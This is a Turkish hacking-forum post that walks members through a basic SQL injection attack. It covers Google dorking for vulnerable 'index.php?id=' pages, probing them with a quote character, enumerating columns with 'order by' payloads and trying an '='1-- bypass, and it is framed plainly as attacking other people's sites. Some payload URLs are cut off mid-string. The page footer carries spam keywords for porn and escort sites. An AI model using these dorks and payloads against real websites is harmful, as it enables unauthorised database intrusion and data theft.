KULLANICI ADI : ŞİFRE Şifremi Unuttum*

Anasayfa İLLEG4L BANK KREDİ SATIN AL İLLEG4LİZM RAP Sub Domain Bulucu Arama Yap Yeni Konular Bugünki Konular

Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
SQL Temel Saldırı/SqManue!
Konu : SQL Temel Saldırı/SqManue! - 06.02.2015, 18:01
Mesaj: #1
SQL Injection ile ilgili birkaç makalemi görmüştünüz.Şimdi temel bir saldırı örneği göstereceğim Başlıyoruz ..

Öncelikle sql açıklı bir site bulmamız gerekli

1.SQL AÇIKLI SİTE BULMA:

Dorkumuzu yazdıktan sonra Google Taratıyoruz benim dorkum

Kod:
index.php?id=?
Örnek sitemiz google 'De gözüktü site adresi

Kod:
www.hextrsite.com/index.php?id=1
Sitemizde SQL Açığı olup olmadığını öğrenelim

Kod:
www.hextrsite.com/index.php?id=1'
Sitemiz SQL Syntax () warning .. adlı hata verdi şimdi saldırıya geçeceğiz.

2.SQL AÇIKLI SİTEYE SALDIRI

Şimdi sitemizden kolon sayısını bulalım

Kod:
www.hextrsite.com/index.php?id=1+order+by+800--
800 'e kadar denediğimi varsayın.Gerçi kim sabredecek , Şimdi değerli HexTR üyeleri sql injection sabır işi olduğunu göreceksiniz fakat buraya gelmeden bypass yapalım

Kod:
http://www.hextrsite.com/index.php?i...order+by+800--
Şimdi hata aldığımızı varsayalım , fakat hala hata almadıysanız son bir örneğim.

Kod:
http://www.hextrsite.com/index.php?i...'='1--
Şuan kolonları bulmadığımızı varsayalım.Değerli HexTR üyesi diyecekki :" kolonları bulamadık değiştirelim gitsin ne uğraşıyoruz !" 
Ama sql injection 'un size sabır işi olduğunu tekrar söylüyorum Değerli Üye ! 

Şimdi devam edelim..

Kod:
http://www.hextrsite.com/index.php?i...'='1--
Ve sayımız sitede gözüktüğünü varsayıyorum artık zorlamadan sizleri.

WWW Alıntı ile Cevapla


Hızlı Menü:


Konuyu Okuyanlar: 1 Ziyaretçi
hd porno antalya escort türk ifşa porno izle türk ifşa porno samsun escort izmir escort ataşehir escort türk ifşa hd porno